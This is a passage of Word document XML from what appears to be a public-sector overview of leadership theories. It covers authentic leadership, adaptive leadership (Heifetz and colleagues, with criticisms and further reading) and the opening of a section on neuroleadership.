      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve">Proponents of authentic leadership do agree that additional work on defining and measuring authentic leadership is </w:t>
      </w:r>
      <w:r w:rsidR="004F6A27" w:rsidRPr="00627C90">
        <w:t xml:space="preserve">necessary. </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve"> discover whether authentic leadership </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>is a foundation for</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve"> good leadership</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>researchers</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27" w:rsidRPr="00627C90">
        <w:t xml:space="preserve"> suggest </w:t>
      </w:r>
      <w:r w:rsidR="004F6A27">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>re is a</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27" w:rsidRPr="00627C90">
        <w:t xml:space="preserve"> need to ‘t</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27" w:rsidRPr="005C26DE">
        <w:t>o examine how authentic leadership is viewed across situations and cultures</w:t>
      </w:r>
      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-89160358"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004F6A27">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004F6A27">
            <w:instrText xml:space="preserve">CITATION Avo09 \p 424 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="004F6A27">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="004F6A27" w:rsidRPr="005A0D09">
            <w:t>(Avolio, et al., 2009, p. 424)</w:t>
          </w:r>
          <w:r w:rsidR="004F6A27">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004F6A27">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="000934DC">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Bruce Avolio, Fred Walumbwa &amp; Todd Weber, (2009). ‘Leadership: Current Theories, Research and Future Directions’ in  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Annual Review of Psychology, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 60.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="007D4C39">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bill George, (2003). </w:t>
      </w:r>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Authentic Leadership: Rediscovering the secrets to creating lasting value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86D6A" w:rsidRPr="000934DC" w:rsidRDefault="00E86D6A" w:rsidP="00E86D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc374536619"/>
      <w:r w:rsidRPr="000934DC">
        <w:lastRenderedPageBreak/>
        <w:t>Adaptive leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="000C5661" w:rsidRPr="007D4C39" w:rsidRDefault="000C5661" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r w:rsidRPr="007D4C39">
        <w:t>For proponents of adaptive leadership, leadership is a practice, not a position.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51050" w:rsidRPr="000934DC" w:rsidRDefault="00066A6B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r w:rsidRPr="000934DC">
        <w:t xml:space="preserve">Adaptive leadership </w:t>
      </w:r>
      <w:r w:rsidR="000C5661" w:rsidRPr="007D4C39">
        <w:t>focuses on leadership as a practice</w:t>
      </w:r>
      <w:r w:rsidR="00F82BA2" w:rsidRPr="000934DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C5661" w:rsidRPr="007D4C39">
        <w:t xml:space="preserve">to be used </w:t>
      </w:r>
      <w:r w:rsidR="00B51050" w:rsidRPr="000934DC">
        <w:t>in situations without known solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ronald </w:t>
      </w:r>
      <w:r w:rsidR="00D901AE">
        <w:t>Heifetz and his colleagues</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> argue that adaptive leadership is a practice not a theory,</w:t>
      </w:r>
      <w:r w:rsidR="00D901AE">
        <w:t xml:space="preserve"> defining it as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the ‘practice of mobilizing people to tackle tough challenges and thrive’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2084905393"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Hei091 \p 14 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:t>(Heifetz, et al., 2009, p. 14)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="005A0D09">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>It is a ‘distributed leadership’ model, which means leadership can be displayed by people across an organisation, not only</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> those in </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>senior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> positions</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t xml:space="preserve"> or management roles</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F397D" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:r>
        <w:t xml:space="preserve">Heifetz et al view leadership and management as distinct but important behaviours </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> complement each other as part of a broader system of action. Management (authority) is best used for technical challenges, problems – routine and complex – where the solution can be found provided you have access to people with the appropriate expertise. Management is about coping with complexity, while leadership is about coping with </w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>adaptive challenges that require adaptive change.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D2ABD" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:r>
        <w:t>Adaptive challenges are those where th</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t>ere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0F9E">
        <w:t xml:space="preserve"> ‘a gap between aspirations and operational capacity that cannot be closed by the expertise and procedures currently in place’</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-287278862"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Cre09 \p 1 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Creelman, 2009, p. 1)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">, they are systemic and have no ready answers. </w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t xml:space="preserve">Adaptive change is </w:t>
      </w:r>
      <w:r w:rsidR="00D901AE">
        <w:t>uncomfortable;</w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t xml:space="preserve"> it challenges our most deeply held beliefs and suggests that deeply held values are losing relevance, bringing to the surface legitimate but competing perspectives or commitments. This means that adaptive challenges</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>require a different form of leadership behaviour</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t>adaptive leaders do not provide the answers</w:t>
      </w:r>
      <w:r w:rsidR="003F397D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(and </w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t xml:space="preserve">do not equate </w:t>
      </w:r>
      <w:r>
        <w:t>leadership with expertise)</w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t xml:space="preserve"> and accept that a degree of disequilibrium is needed to sustain adaptive change (rather than minimising conflict and discomfort). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidDel="00B51050" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:r>
        <w:t>Core to adaptive work are three activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Observing events and patterns, taking in this information as data without forming judgements or making assumptions about th</w:t>
      </w:r>
      <w:r w:rsidR="007D2ABD">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data’s meaning;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidRDefault="007D2ABD" w:rsidP="007E0F69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007E0F69">
        <w:t>entatively interpreting observ</w:t>
      </w:r>
      <w:r>
        <w:t>ations</w:t>
      </w:r>
      <w:r w:rsidR="007E0F69">
        <w:t xml:space="preserve"> by developing multiple hypotheses about what is really going on, and at the same time, recognising that hypotheses are simply that - hypotheses; and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidRDefault="007E0F69" w:rsidP="007E0F69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Designing interventions based on your observations and interpretations in the service of making progress on the adaptive challenge. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="925696690"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Hei091 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="00C001C3">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Heifetz, et al., 2009)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007E0F69" w:rsidRDefault="007E0F69" w:rsidP="005C26DE">
      <w:r w:rsidRPr="001E37CE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>The Practice of Adaptive Leadership: Tools and Tactics for Changing Your Organization and the World</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1364746114"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:instrText xml:space="preserve"> CITATION Hei091 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:t xml:space="preserve"> (Heifetz, et al., 2009)</w:t>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001E37CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E37CE">
        <w:t xml:space="preserve"> published as a ‘field guide’ for learning and developing adaptive leadership skills</w:t>
      </w:r>
      <w:r w:rsidR="00672A76">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidRPr="001E37CE">
        <w:t>he authors suggest that ‘practicing adaptive leadership is difficult on the one hand and profoundly meaningful on the other’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF73D9">
        <w:t>, while warning that ‘it is not</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB5AA3">
        <w:t xml:space="preserve"> something you should enter into casually’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1475486294"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:instrText xml:space="preserve">CITATION Hei091 \p 41 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:t>(Heifetz, et al., 2009, p. 41)</w:t>
          </w:r>
          <w:r w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001E37CE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0093255E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Leadership, when seen in this light, requires a learning strategy … The adaptive demands of our time require leaders who</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0BA3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> take responsibility without wa</w:t>
      </w:r>
      <w:r w:rsidRPr="0093255E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">iting for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0093255E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>evelation or request. One can lead with no more than a question in hand.”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="753398464"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B06CAA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B06CAA">
            <w:instrText xml:space="preserve">CITATION Hei11 \p 78 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B06CAA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B06CAA" w:rsidRPr="00B86174">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Heifetz &amp; Laurie, 2011, p. 78)</w:t>
          </w:r>
          <w:r w:rsidR="00B06CAA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B06CAA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A76" w:rsidRDefault="00D13B82" w:rsidP="00D13B82">
      <w:r>
        <w:t>Adaptive leadership has been criticised for failing to conform to traditional views of ‘the leader’, with suggestions that it would be better described as facilitation or catalysing rather than ‘leading’</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-783884645"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION McC13 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>(McCrimmon, n.d.)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>McCrimmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1516268695"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION McC13 \n  \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(n.d.)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00672A76">
        <w:t>also argues</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that not all leadership occurs in the context of a problem; that leadership can occur without leaders and followers necessarily working together to solve a problem (i.e. action taken by one</w:t>
      </w:r>
      <w:r w:rsidR="00672A76">
        <w:t xml:space="preserve"> person</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can influence others); and that change can sometimes be easily made without confronting an adaptive challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13B82" w:rsidRDefault="00D13B82" w:rsidP="00D13B82">
      <w:r>
        <w:t xml:space="preserve">The disconnect between what has come to be expected of a leadership theory </w:t>
      </w:r>
      <w:r w:rsidR="00672A76">
        <w:t>versus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the principles adaptive leadership promotes appears to arise from a failure to appreciate that Heifetz is not advocating the use of adaptive leadership at all times and is instead offering a set of tools and principles that can be </w:t>
      </w:r>
      <w:r w:rsidR="005D21E8">
        <w:t xml:space="preserve">applied </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to work through specific challenges and periods of change. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="000934DC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ronald Heifetz (1994). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>Leadership without Easy A</w:t>
      </w:r>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:t>nswers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="000934DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ronald Heifetz, Alexander Grashow &amp; Marty Linsky, (2009). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Adaptive Leadership; Tools and Tactics for Changing Your Organization and the World. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="000934DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRPr="00B86174" w:rsidRDefault="000934DC" w:rsidP="00B86174">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093255E">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ronald Heifetz &amp; Donald Laurie (2011). The Work of Leadership. In </w:t>
      </w:r>
      <w:r w:rsidRPr="00832162">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>HBR’s 10 Must Reads: On Leadership</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06CAA">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0BA3">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>(pp57-78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="0093255E">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32E4F" w:rsidRDefault="0023342B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc374536620"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Neuroleadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004C3718" w:rsidRPr="000C5661" w:rsidRDefault="000C5661" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B86174">
        <w:t>Neuroleadership</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B86174">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00726A5A">
        <w:t>appl</w:t>
      </w:r>
      <w:r w:rsidR="00672A76">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00726A5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00726A5A">
        <w:t>neuroscientific</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00726A5A">
        <w:t xml:space="preserve"> findings </w:t>
      </w:r>
      <w:r w:rsidR="00D86C49" w:rsidRPr="000C5661">
        <w:t xml:space="preserve">to the field of leadership. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672A76" w:rsidRDefault="00410742">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="009176BF">
        <w:t>euroleadership</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009176BF">
        <w:t xml:space="preserve"> aim</w:t>
      </w:r>
      <w:r w:rsidR="0023342B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009176BF">
        <w:t xml:space="preserve"> to ‘improve leadership effectiveness … by developing a science for leadership and leadership development that directly takes into account the physiology of the mind and the brain’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1186824179"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009176BF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009176BF">
            <w:instrText xml:space="preserve"> CITATION Rin08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="009176BF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009176BF" w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Ringleb &amp; Rock, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="009176BF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0023342B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004A07C6">
        <w:t xml:space="preserve">Advances in </w:t>
      </w:r>
      <w:r w:rsidR="00B12F65">
        <w:t xml:space="preserve">imaging techniques are enabling scientists to understand how </w:t>
      </w:r>
      <w:r w:rsidR="004A07C6">
